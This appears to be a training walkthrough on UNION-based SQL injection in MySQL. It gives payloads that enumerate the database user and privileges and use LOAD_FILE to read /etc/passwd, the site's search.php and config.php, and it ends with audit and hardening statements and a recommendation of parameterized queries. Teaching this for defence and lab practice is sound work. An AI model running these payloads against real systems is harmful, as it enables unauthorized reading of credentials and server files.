# Reading Files

## **DB User**

```sql
SELECT USER();
SELECT CURRENT_USER();
SELECT user FROM mysql.user;
```

Our `UNION` injection payload will be as follows:

```sql
cn' UNION SELECT 1, user(), 3, 4-- -
-- or
cn' UNION SELECT 1, user, 3, 4 from mysql.user-- -
```

This tells us our current user, which in this case is `root`:

<figure><img src="/files/3cLDPMNw1Mcu7dhB2wux" alt=""><figcaption></figcaption></figure>

## **User Privileges**

```sql
SELECT super_priv FROM mysql.user;
```

Once again, we can use the following payload with the above query:

```sql
cn' UNION SELECT 1, super_priv, 3, 4 FROM mysql.user-- -
```

If there were many users within the DBMS, we could add `WHERE user="root"` to only show privileges for our current user `root`:

```sql
cn' UNION SELECT 1, super_priv, 3, 4 FROM mysql.user WHERE user="root"-- -
```

<figure><img src="/files/r6ty7z9ubATXtWkyLUp1" alt=""><figcaption></figcaption></figure>

The query returns `Y`, which means `YES`, indicating superuser privileges. We can also dump other privileges we have directly from the schema, with the following query:

```sql
cn' UNION SELECT 1, grantee, privilege_type, 4 FROM information_schema.user_privileges-- -
```

From here, we can add `WHERE grantee="'root'@'localhost'"` to only show the privileges of our current user `root`. Our payload would be:

```sql
cn' UNION SELECT 1, grantee, privilege_type, 4 FROM information_schema.user_privileges WHERE grantee="'root'@'localhost'"-- -
```

And we see all of the possible privileges given to our current user:

<figure><img src="/files/YS4FPYmiNsf3EC6Cjt3B" alt=""><figcaption></figcaption></figure>

## LOAD\_FILE

```sql
SELECT LOAD_FILE('/etc/passwd');
```

> Note: We will only be able to read the file if the OS user running MySQL has enough privileges to read it.

Similar to how we have been using a `UNION` injection, we can use the above query:

```sql
cn' UNION SELECT 1, LOAD_FILE("/etc/passwd"), 3, 4-- -
```

<figure><img src="/files/16gOeQmW7FEqKFSExgUh" alt=""><figcaption></figcaption></figure>

## Another Example

We know that the current page is `search.php`. The default Apache webroot is `/var/www/html`. Let us try reading the source code of the file at `/var/www/html/search.php`:

```sql
cn' UNION SELECT 1, LOAD_FILE("/var/www/html/search.php"), 3, 4-- -
```

<figure><img src="/files/qJTt2nwuOObxImA2VvYP" alt=""><figcaption></figcaption></figure>

However, the page ends up rendering the HTML code within the browser. The HTML source can be viewed by hitting `[Ctrl + U]`.

```sql
' UNION SELECT 1, load_file('/var/www/html/config.php'), 3, 4-- -
```

<figure><img src="/files/P649mYAEYmZbuHt04k6F" alt=""><figcaption></figcaption></figure>
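The file reads above depend on the web application connecting as an account that holds the `FILE` privilege (here `root`). The following audit and hardening statements are an added example, not part of the original notes; the `webapp` account, the `appdb` schema and the password placeholder are assumptions.

```sql
-- 1. Audit: which accounts hold the privileges enumerated on this page?
--    FILE is what LOAD_FILE() requires; SUPER corresponds to super_priv = 'Y'.
SELECT grantee, privilege_type
FROM information_schema.user_privileges
WHERE privilege_type IN ('FILE', 'SUPER')
ORDER BY grantee, privilege_type;

-- 2. Audit: is file access restricted to a directory?
--    Empty value: no restriction.
--    Directory name: LOAD_FILE() can only read files located in that directory.
--    NULL: the server disables import and export operations.
--    The variable is read-only at runtime; set it in the [mysqld] section
--    of the server option file and restart.
SHOW VARIABLES LIKE 'secure_file_priv';

-- 3. Harden: give the web application its own least-privilege account
--    instead of root (hypothetical names; replace the password placeholder).
CREATE USER 'webapp'@'localhost' IDENTIFIED BY '<strong-random-password>';
GRANT SELECT ON appdb.* TO 'webapp'@'localhost';

-- 4. Verify: confirm that FILE and SUPER do not appear in the grants
--    for the application account.
SHOW GRANTS FOR 'webapp'@'localhost';

-- 5. Verify from the application's own connection: the same check the
--    page performs, restricted to the new account.
SELECT grantee, privilege_type
FROM information_schema.user_privileges
WHERE grantee = "'webapp'@'localhost'";
```

Least privilege limits what an injection can reach; the injection itself is removed by using parameterized queries in `search.php`.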

